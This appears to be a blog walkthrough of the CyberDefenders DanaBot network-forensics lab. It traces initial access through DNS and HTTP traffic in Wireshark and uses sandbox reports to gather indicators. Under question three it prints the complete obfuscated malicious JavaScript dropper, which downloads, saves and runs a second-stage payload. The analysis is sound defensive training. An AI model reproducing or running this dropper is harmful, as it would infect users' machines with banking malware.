Analyze network traffic using Wireshark to identify DanaBot initial access, deobfuscate malicious JavaScript, and extract IOCs like IPs, file hashes, and execution processes..
Introduction
Back to CyberDefenders yet again! A lot of my recent posts have been focused more on Threat Intel. Threat Intel is great to have in the back of your mind as being something you may need to do. Attribution is important if you’re a Threat Hunter/Researcher, but if you’re a SOC Analyst then it’s not very likely that you’ll be collating every indicator from an alert - It’s much more likely that you’ll pick up an alert and investigate it, close it, and move on with the next five alerts that have come into your SIEM in the time it took.
We’ll be going through the DanaBot Lab from CyberDefenders today. From the initial description we already know that we’ll be using Wireshark for this lab. It’s important to keep practicing tools as you learn. It’s pretty easy to find a course online that will teach you what Wireshark is, but knowing what it is and actually using it are very different. I’ve always found that getting hands-on practice with a tool is a lot better than reading a manual, so I’m excited to dive in!
The SOC team has detected suspicious activity in the network traffic, revealing that a machine has been compromised. Sensitive company information has been stolen. Your task is to use Network Capture (PCAP) files and Threat Intelligence to investigate the incident and determine how the breach occurred.
The scenario introduction gives us some nice background to the lab. From the above text we already know that an endpoint in the environment has been compromised and data has been exfiltrated. We’ll also be using Threat Intelligence later on, so I’m excited to continue!
Before we get started on any of the questions we need to download the lab files. We have just the one file - 205-DanaBot.pcap. Once we have this file downloaded we’re good to go!
Question one
Which IP address was used by the attacker during the initial access?
As per the first hint:
When investigating a security incident, DNS requests often reveal the first point of contact between the victim and attacker. Have you looked at the DNS traffic in the PCAP file?
After opening the .pcap in wireshark we can apply a filter for the dns protocol. This is a very basic filter but following along with the hint it will help find an initial access point.
There are 144 packets displayed with this filter. 144 is still a lot of packets, and we can definitely filter this down further with additional filter queries. We’ll touch more on that later on, but for now I like to do a quick scan to see if anything jumps out as being suspicious.
A majority of the packets will show dns requests to legitimate domains; Things like windows.com or microsoft.com and their various subdomains. If you’re not familiar with some of these domains then this is a good glimpse into how many queries windows endpoints will send out to microsoft services. Phoning back home to Windows/Microsoft is pretty common when windows is chugging along in the background.
One of the dns queries in the .pcap is going to the destination ipv6.msftconnecttest.com. If you’re not familiar with this domain, don’t freak out. Searching for it quickly shows this microsoft learn question. Here’s the answer which does a pretty good job at explaining what this request is doing:
This happens because the operating system starts, tests are running to verify that everything works fine. Verification of Internet access is done with the intention of preventing downed processes that need to access the network.
Breaking down the URL should also reveal this. The subdomain ipv6 points to this being related to something to do with ipv6, the actual domain msftconnecttest.com can be broken down to microsoft (msft) connect test (connecttest.com). Putting that all together it makes sense that this is a connectivity test for microsoft (and therefore windows), testing ipv6 specifically.
We can disregard all these legitimate microsoft/windows domains. At a quick glance I saw a connection to a domain that seemed off - Standard query 0xc889 A portfolio.serveirc.com.
The URL portfolio.serveirc.com doesn’t match with any microsoft/windows domains that I know of. After looking into the IP, this is our answer.
Question two
What is the name of the malicious file used for initial access?
We know the IP address (and the domain name) associated with the infostealer, so let’s find what happened after the initial dns query.
From the wording of the question we know that a file was downloaded at some point. With the malicious IP address konwn, we can filter for packets where the IP is the source, and where a file was downloaded. ip.src == 62.173.142.148 was the filter I ultimately went with. It’s very basic and in a much larger .pcap file we would likely need to filter this down further, but for this lab it does the job.
There is only one http packet that match this filter. The rest of those shown are tcp. Looking at the details of this packet we can see Content-disposition: attachment;filename=allegato_708.js, giving us the answer of the file that was downloaded when the login.php page was visited.
Question three
What is the SHA-256 hash of the malicious file used for initial access?
To get this answer we’ll need to get our hands on the file. My ISP has actually blocked me from accessing the URL which is nice for average end-users, but for someone doing network analysis on a malware sample it’s a bit annoying.
Thankfully this is a known malare sample. I tried to pull the hash via a few means, like copying the content of the javascript into an empty file and running sha265sum over it. Unsurprisingly this didn’t work, but here’s the javascript, bare in mind that this is malicious:
function _0x23c2(){var _0xac67d2=['a8k3odVdVaBcHh/dUmoMWRBdK8kS','W6XeW43cPJWvWQ/cGhykW5FcQ3O','WOa1eupdOSkXWROVjCoMbLldTNq','WQWlk2mA','j8ocW6xcJ0hdNCoJW4RcPsRdVmo6kW','pmk+dmk5W6qEW67dOMi','ECo8WPZdNmojb37dQSoLe8kIja','tmopD8k7W7a1W4VdSLeMuCoNWP1VW5pcVgehWPzkB3hdKKSpnatdICkRoIxdT1O/W6Tzru3dMmoBmCkfW6xcNmkdW6ZdJ8oWCSklWQ/dVG','AcXXvd0E','W5hcUaxcQZFdG8khp13dMezGeG','gSkFWPRdN8kLrCkMdq','kSoWqSkCqmobWRhcGtCsjYm','WPKzWQCXWOhdTmo/','W6uSb8o4z8oHxbVcRfNdICou','W5JcIImOW57cRCoOhJO','jKJcOIerWOhcMaXtd01a','W69bW4pcOtWAWQNcRLm+W6tcQ2e','WQvGi8kdW59hjSkCsx3cRCkR','vCozW4/cRCkEWQRdS8onFsTaWPRcJCoru8o6','W7TtCJvFwHeFW53dSrjc','BXinydldQ8oeWQpdK15tW7pcVq','wCo0rmkA','WQVdH1zWwcldI8kmnNpdSCoUWO0','p2OrWOqWWRS','W7iWWQu2','g3K9WPC','WPS6amoPESo7','n2rUfXKj','lSkTamkgb8o2W7tcH8ktqSkAWOSIWQXnW6u','W6fVuXRcPSo3W4Wio8o4exJdSa','W6XdW4FcOtGAWQ7cRuCyW6RcMxC','W6qOaSoTxmoGArFcGLm','ASkXW5aoWQS','qmoEBmkYW7LbWQldOLuGuSo/WOrX','W6VcUv0vELW+WQ8yfCkbW4S','BSkGW4StWR7cRg1RzCo+WPjfeSoNW4LfF8k7mwrDiJVdTf7cQW','eSofqmkq','W6hcGmkYmLHeWRJdNfuiW4jrqCkVzmkHhmknWPz/W6pcNJ/dRSoSW4WSpNn2WPiGW5a','W7HEDdXCuxqpW6hdUqrWW5K','W4pdVrDzWPJcMmkvmZefcNS','W5/dJfJdUMZcT8o2','g0qgkvtdTG','AXWozJVdQ8kKWQNdQwPRW5m','ueNcGq','W4neW7ZcHLJdJ8kTBmkqW7HAt28','iSktWPxcO8k5y0WHsce','E8k3WQG+W5e','yCoKCMFcUeRdMxtdM8kDWRNdR8kzqmoPWQ87W5aAWR1woH7cRCoxW6S','gwbR','fhfLhG'];_0x23c2=function(){return _0xac67d2;};return _0x23c2();}var _0x10ab20=_0x57c2;(function(_0x562920,_0x324070){var _0x4c8674=_0x57c2,_0x538a6a=_0x562920();while(!![]){try{var _0x385777=parseInt(_0x4c8674(0x158,'XkeN'))/0x1+parseInt(_0x4c8674(0x12e,'[%Fm'))/0x2+-parseInt(_0x4c8674(0x142,'XkeN'))/0x3+parseInt(_0x4c8674(0x13e,'O%ju'))/0x4+-parseInt(_0x4c8674(0x14b,'xQOj'))/0x5+parseInt(_0x4c8674(0x133,'A4&G'))/0x6*(parseInt(_0x4c8674(0x150,'dK59'))/0x7)+-parseInt(_0x4c8674(0x156,'(Q&R'))/0x8*(parseInt(_0x4c8674(0x132,'OlYg'))/0x9);if(_0x385777===_0x324070)break;else _0x538a6a['push'](_0x538a6a['shift']());}catch(_0x2d274b){_0x538a6a['push'](_0x538a6a['shift']());}}}(_0x23c2,0x54a3a));function _0x414360(_0x5c5160){var _0x567e59=_0x57c2,_0x119065='',_0x4f008b=_0x567e59(0x135,'A4&G'),_0x5a393f=_0x4f008b[_0x567e59(0x149,'w@FV')];for(var _0x3d45b7=0x0;_0x3d45b7<_0x5c5160;_0x3d45b7++){_0x119065+=_0x4f008b[_0x567e59(0x157,'*rdb')](Math[_0x567e59(0x131,'sRMv')](Math[_0x567e59(0x145,'GKs8')]()*_0x5a393f));}return _0x119065+_0x567e59(0x147,'5%8N');}var _0x23d4f8=_0x10ab20(0x153,'%$(b'),_0x48a85a=_0x414360(0xa),_0x44bdd9=new ActiveXObject(_0x10ab20(0x151,'V6of'))[_0x10ab20(0x14a,'^5PL')](0x2)+'\x5c'+_0x48a85a,_0x5da57f=WScript[_0x10ab20(0x134,'oGec')](_0x10ab20(0x14f,'A4&G'));function _0x57c2(_0x11e4af,_0x54a6eb){var _0x23c29e=_0x23c2();return _0x57c2=function(_0x57c28d,_0x19268b){_0x57c28d=_0x57c28d-0x128;var _0x26c549=_0x23c29e[_0x57c28d];if(_0x57c2['VLfCmI']===undefined){var _0x9ab1c1=function(_0x49a20c){var _0x3b5c63='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0xcdecf3='',_0x16e53d='';for(var _0x39434a=0x0,_0x3cb912,_0x118fbd,_0x4e12df=0x0;_0x118fbd=_0x49a20c['charAt'](_0x4e12df++);~_0x118fbd&&(_0x3cb912=_0x39434a%0x4?_0x3cb912*0x40+_0x118fbd:_0x118fbd,_0x39434a++%0x4)?_0xcdecf3+=String['fromCharCode'](0xff&_0x3cb912>>(-0x2*_0x39434a&0x6)):0x0){_0x118fbd=_0x3b5c63['indexOf'](_0x118fbd);}for(var _0x42daf9=0x0,_0x4f2d07=_0xcdecf3['length'];_0x42daf9<_0x4f2d07;_0x42daf9++){_0x16e53d+='%'+('00'+_0xcdecf3['charCodeAt'](_0x42daf9)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x16e53d);};var _0x1be13e=function(_0x43cbd0,_0x5e5510){var _0x14b9a0=[],_0x24e5cd=0x0,_0x5c44af,_0x5c1992='';_0x43cbd0=_0x9ab1c1(_0x43cbd0);var _0x363895;for(_0x363895=0x0;_0x363895<0x100;_0x363895++){_0x14b9a0[_0x363895]=_0x363895;}for(_0x363895=0x0;_0x363895<0x100;_0x363895++){_0x24e5cd=(_0x24e5cd+_0x14b9a0[_0x363895]+_0x5e5510['charCodeAt'](_0x363895%_0x5e5510['length']))%0x100,_0x5c44af=_0x14b9a0[_0x363895],_0x14b9a0[_0x363895]=_0x14b9a0[_0x24e5cd],_0x14b9a0[_0x24e5cd]=_0x5c44af;}_0x363895=0x0,_0x24e5cd=0x0;for(var _0x46ed8b=0x0;_0x46ed8b<_0x43cbd0['length'];_0x46ed8b++){_0x363895=(_0x363895+0x1)%0x100,_0x24e5cd=(_0x24e5cd+_0x14b9a0[_0x363895])%0x100,_0x5c44af=_0x14b9a0[_0x363895],_0x14b9a0[_0x363895]=_0x14b9a0[_0x24e5cd],_0x14b9a0[_0x24e5cd]=_0x5c44af,_0x5c1992+=String['fromCharCode'](_0x43cbd0['charCodeAt'](_0x46ed8b)^_0x14b9a0[(_0x14b9a0[_0x363895]+_0x14b9a0[_0x24e5cd])%0x100]);}return _0x5c1992;};_0x57c2['Gcvrzi']=_0x1be13e,_0x11e4af=arguments,_0x57c2['VLfCmI']=!![];}var _0x178ebd=_0x23c29e[0x0],_0x14ddc7=_0x57c28d+_0x178ebd,_0x2a1ef9=_0x11e4af[_0x14ddc7];return!_0x2a1ef9?(_0x57c2['BCBEPx']===undefined&&(_0x57c2['BCBEPx']=!![]),_0x26c549=_0x57c2['Gcvrzi'](_0x26c549,_0x19268b),_0x11e4af[_0x14ddc7]=_0x26c549):_0x26c549=_0x2a1ef9,_0x26c549;},_0x57c2(_0x11e4af,_0x54a6eb);}_0x5da57f[_0x10ab20(0x12d,'w@FV')](_0x10ab20(0x12c,'XkeN'),_0x23d4f8,![]),_0x5da57f[_0x10ab20(0x146,'B[vm')]();if(_0x5da57f[_0x10ab20(0x136,'t2ew')]==0xc8){var _0x3c8952=WScript[_0x10ab20(0x139,'RdnH')](_0x10ab20(0x155,'6N7O'));_0x3c8952[_0x10ab20(0x152,'1GKJ')](),_0x3c8952[_0x10ab20(0x143,'A4&G')]=0x1,_0x3c8952[_0x10ab20(0x14e,'V6of')](_0x5da57f[_0x10ab20(0x13b,'h*Z]')]),_0x3c8952[_0x10ab20(0x138,'JDok')]=0x0,_0x3c8952[_0x10ab20(0x14d,'h*Z]')](_0x44bdd9,0x2),_0x3c8952[_0x10ab20(0x12a,'DYtC')]();var _0x1e16b0=WScript[_0x10ab20(0x13f,']o#z')](_0x10ab20(0x144,'o]7W'));_0x1e16b0[_0x10ab20(0x159,'^n!v')](_0x10ab20(0x140,'1^^k')+_0x44bdd9+_0x10ab20(0x148,'h*Z]'),0x0,!![]);}new ActiveXObject(_0x10ab20(0x12b,'[%Fm'))[_0x10ab20(0x129,'$$(i')](WScript[_0x10ab20(0x130,'xQOj')]);
The above javascript is heavily obfuscated, but we’ll touch more on it later on.
For now we’ll have to hope that the file has been analyzed on one of the many online sandboxes, and after a quick search we can find this any.run report on the allegato_708.js file, which contains the sha256 sum.
Question four
Which process was used to execute the malicious file?
I’ve written about my annoyances with any.run before, so we’re actually going to change it up a bit and move to RecordedFuture’s tria.ge report for the filehash. In the tab for the javascript file we can see the Processes section, which gives us the execution parent of the malicious file.
Question five
What is the file extension of the second malicious file utilized by the attacker?
Time to go back to that obfuscated javascript!
There are a few different ‘deobfuscator’s available online. When I pasted the javascript into one of them it actually suggested that I use deobfuscate.io’s decoder, which is nice.
Here’s the deobfuscated javascript, remember this is from a malware sample:
|
|
The secondary payload can be seen in plaintext pretty clearly. If it’s not clear then I’ve highlighted it for you!
Question six
What is the MD5 hash of the second malicious file?
We’ll hop over to urlhaus and search for the URL of that malicious .dll file. Unfortunately I ran into the same issues with my ISP blocking me from downloading the file outright, so we need to work around this a bit.
I found this report for the URL. Down in the Payload delivery section we can see the SHA256 hashes that URLhaus has retrieved from the URL. There are five hashes shown here and unfortunately for us they are not displayed as MD5. We can still use the SHA256 hash though. We’ll start from the first hash shown and put this into what is quickly becoming one of my favorite TI sites, RecordedFuture’s Tria.ge.
I found this report which matches the file-name, the SHA265 hash, and shows us the MD5 hash.
Conclusion
I was expecting a bit more Wireshark in this lab, if I’m being honest. The tools tagged on this lab are; Wireshark, VirusTotal, ANY.RUN, and Network Miner. I used the first three for sure, but I was expecting this to be a full Wireshark-only lab. I’ll be trying to target more Wireshark-specific labs in the future. So stay tuned!